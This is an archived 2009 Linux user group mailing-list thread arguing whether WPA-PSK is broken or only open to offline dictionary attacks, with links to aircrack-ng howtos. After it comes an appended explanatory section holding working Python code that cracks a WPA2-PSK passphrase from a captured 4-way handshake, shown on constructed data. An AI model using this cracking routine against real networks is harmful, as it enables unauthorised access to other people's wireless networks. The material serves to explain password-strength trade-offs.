running Linux on odd devices is SOOO COOL!

Lisa Kachold lisakachold at obnosis.com
Sun Nov 15 05:57:32 MST 2009


On Saturday, November 14, 2009, Kurt Granroth
<kurt+plug-discuss at granroth.com> wrote:
> Lisa,
>
> I'll grant you the denial-of-service attack, but I'm still not finding
> any evidence that WPA is fundamentally flawed (much less "easier to
> crack... than WEP").
You simply capture the auth with aircrack-ng.
Even 20 characters can be decrypted eventually!  A dictionary attack
is faster, and a truly random password delays the process, and none of
this is any reason not to use security tools, but the fact is the
protocol has been broken! I know I put in a Nomadix and Cisco Aironet
with Active Directory and RADIUS in 2003.
RADIUS is a nice solution; we used them for our dialup with Livingstons
at Nike and various ISPs.
> I read the aircrack article earlier to see if there was new info that I
> had missed.  I also read the article you have on obnosis.com.  Finally,
> I read the LucidInteractive article you just provided.
>
> ALL of them say the same thing: the only valid attack on WPA-PSK is a
> dictionary or brute force attack!
>
> Okay, yes, it's very handy that you can do the password cracking
> offline.  But see the links I listed earlier... any decently crafted
> password will be nigh IMPOSSIBLE to crack unless you have nearly
> infinite resources -- offline or no.
>
> I realize that you likely (for sure) know more about this than I do so
> if I keep missing some fundamental flaw in PSK in all of the articles
> provided, please enlighten me!
>
> Kurt
>
> On 11/14/09 5:59 PM, Lisa Kachold wrote:
>> Kurt,
>>
>> As you stated, WPA/WPA2-PSK security is inherently flawed:
>>
>>     * One flaw allowed an attacker to cause a denial-of-service attack,
>>       if the attacker could bypass several other layers of protection.
>>     * A second flaw exists in the method with which WPA initializes its
>>       encryption scheme. Consequently, it's actually easier to crack WPA
>>       than it is to crack WEP. This flaw is the subject of this article.
>>
>>
>> A WPA key can be made good enough to make cracking it unfeasible. WPA
>> is also a little more cracker friendly. By capturing the right type of
>> packets, you can do your cracking offline. This means you only have to
>> be near the AP for a matter of seconds to get what you need. WPA
>> basically comes in two flavours RADIUS or PSK. PSK is crackable, RADIUS
>> is not so much.
>>
>> But how many people actually have WPA RADIUS encryption?
>>
>> Here's another link that includes PSK cracking Howto:
>> http://www.aircrack-ng.org/doku.php?id=cracking_wpa
>>
>> Using aircrack-ng tools in Backtrack (per my presentation materials at
>> http://plug.phoenix.az.us show) WEP and WPA/WPA2-PSK are easy to crack.
>>
>> Does anyone here run Radius?
>>
>> Here's an accompanying document to better explain it:
>> http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
>>
>>
>> On Sat, Nov 14, 2009 at 7:32 PM, Kurt Granroth
>> <kurt+plug-discuss at granroth.com> wrote:
>>
>>     On 11/14/09 12:02 PM, Lisa Kachold wrote:
>>      > The whole concept of "wireless encryption security" is somewhat moot
>>      > with airodump-ng etc. tools.
>>      >
>>      > WEP keys are really easy to break.
>>      >
>>      > WPA is also easily encroached - but harder with a truly unique
>>     secure
>>      > key (which few people use)
>>      >
>>      > It just exists as part of the big "security" matrix to keep the
>>     honest
>>      > people out.  Crackers can get right in anyway!
>>      >
>>      > http://www.obnosis.com/Layer8Wireless.html
>>
>>     Okay, I have to take exception to how this is written.  You are
>>     comparing the security of WEP and WPA as if they are somehow equivalent
>>     or equally "easy" to crack.  That is just not true.
>>
>>     WEP is fundamentally broken.  It can be reliably cracked in seconds, in
>>     most cases.  Its use is more of a "please don't use this network" flag
>>     than any real attempt to keep people out.
>>
>>     WPA, on the other hand, is NOT broken.  Only one variation of it is
>>     crackable at all (PSK) and even then, the attack is a brute force
>>     dictionary attack.  By that argument, ALL password based encryption is
>>     crackable.
>>
>>     Yes, you could successfully argue that since MOST home APs use PSK and
>>     MOST probably just set the password to 'admin' or 'linksys' or some
>>     other trivial name, that IN PRACTICE, it's not hard to crack most uses
>>     of WPA.
>>
>>     But saying that "[c]rackers can get right in anyway" just isn't true.
>>     All that is needed is a reasonably difficult password.  Don't use a
>>     dictionary word and make it decently long and it quickly becomes far too
>>     difficult to crack to make it worth it for all but the most extreme
>>     cases.  It's either VERY expensive or takes YEARS.
>>
>>     I'm sure that you read this:
>>
>>     http://news.electricalchemy.net/2009/10/password-cracking-in-cloud-part-5.html
>>
>>     It answers the question: "how much does it cost to crack a password?"
>>     It assumes that you are using Amazon EC2 at $0.30 an hour.  A twelve
>>     character password using the full ASCII set would cost over $8 TRILLION
>>     dollars to crack.  Even much smaller passwords are still in the
>>     millions.
>>
>>     The password that I use on my WPA2-PSK AP is 20-odd chars long and spans
>>     the ASCII range.  Far from allowing crackers to "get right in", it's
>>     nearly impossible for them to do so.
>>     ---------------------------------------------------
>>     PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>>     To subscribe, unsubscribe, or to change your mail settings:
>>     http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>
>>
>>
>>
>> --
>> Skype: (623)239-3392
>> AT&T: (503)754-4452
>> www.it-clowns.com
>>

-- 
Skype: (623)239-3392
AT&T: (503)754-4452
www.it-clowns.com
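The thread above argues both sides of the same fact: once the 4-way handshake has been sniffed, guessing a WPA/WPA2-PSK passphrase is an entirely offline computation (PBKDF2 of the candidate with the SSID, then the PTK and the EAPOL MIC), so a wordlist finds a weak key quickly while a long random key makes the keyspace unaffordable. The following is an added example written for this page; it is not code from the list, from aircrack-ng or from any of the linked articles. The SSID, passphrase, MAC addresses, nonces, the simplified EAPOL-Key layout, the key-info value, and the guesses-per-second and hourly price figures are all constructed assumptions; the PMK/PTK/MIC derivation itself follows IEEE 802.11i.

```python
"""Offline WPA/WPA2-PSK dictionary attack against a captured 4-way handshake.

All inputs below are constructed: the "captured" handshake is generated
locally from a known passphrase, then recovered from a small wordlist.
"""
import hashlib
import hmac
import random


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i PMK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).

    The 4096 rounds are the only thing slowing a guess; every candidate costs
    one PBKDF2 run, and the work is fully offline once the handshake is sniffed.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def wpa_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus the public values visible in the handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2) MIC: HMAC-SHA1 over the EAPOL-Key frame
    with its MIC field zeroed, truncated to 16 bytes (WPA/TKIP uses HMAC-MD5)."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(handshake: dict, ssid: str, wordlist):
    """The attack aircrack-ng runs: for each candidate derive PMK -> PTK -> KCK,
    recompute the MIC of message 2 and compare it with the sniffed MIC."""
    for candidate in wordlist:
        pmk = wpa_pmk(candidate, ssid)
        ptk = wpa_ptk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                      handshake["anonce"], handshake["snonce"])
        kck = ptk[:16]  # Key Confirmation Key is the first 128 bits of the PTK
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return candidate
    return None


def make_handshake(passphrase: str, ssid: str, seed: int = 1) -> dict:
    """Constructed stand-in for a sniffed handshake (message 2 of 4).

    Only the fields the attacker needs are produced; the EAPOL body is a
    simplified EAPOL-Key layout with the 16-byte MIC field left as zeros,
    which is exactly what the cracker hashes over.
    """
    rnd = random.Random(seed)
    rand = lambda n: bytes(rnd.getrandbits(8) for _ in range(n))
    ap_mac, sta_mac = rand(6), rand(6)
    anonce, snonce = rand(32), rand(32)
    body = (b"\x02"            # descriptor type: RSN (assumed)
            + b"\x01\x0a"      # key info: version 2, pairwise, MIC bit (assumed)
            + b"\x00\x10"      # key length 16
            + b"\x00" * 8      # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, ID
            + b"\x00" * 16     # MIC field, zeroed before hashing
            + b"\x00\x00")     # key data length
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, EAPOL-Key
    kck = wpa_ptk(wpa_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce, "snonce": snonce,
            "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def brute_force_cost_usd(length: int, alphabet_size: int,
                         guesses_per_sec: float, usd_per_hour: float) -> float:
    """Cost to exhaust a keyspace of alphabet_size**length at a given PBKDF2 rate.
    The rate and hourly price are assumptions supplied by the caller."""
    hours = alphabet_size ** length / guesses_per_sec / 3600
    return hours * usd_per_hour


if __name__ == "__main__":
    ssid = "PLUG-demo"  # constructed
    hs = make_handshake("phoenixlinux", ssid)  # constructed passphrase
    wordlist = ["password", "linksys", "admin", "phoenixlinux", "letmein"]
    print("recovered:", crack_psk(hs, ssid, wordlist))
    # 20 chars from 95 printable ASCII at an assumed 1e6 guesses/s on $0.30/h:
    print("USD to exhaust keyspace: %.3g" % brute_force_cost_usd(20, 95, 1e6, 0.30))
```

Note that nothing in `crack_psk` touches the network: the MACs, nonces and MIC are all read from the sniffed frames, and the SSID is the PBKDF2 salt, which is why the same passphrase on a different SSID has to be cracked again, and why a trivial passphrase falls to a wordlist in seconds while the cost estimate for a long random one is astronomical at any realistic rate.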

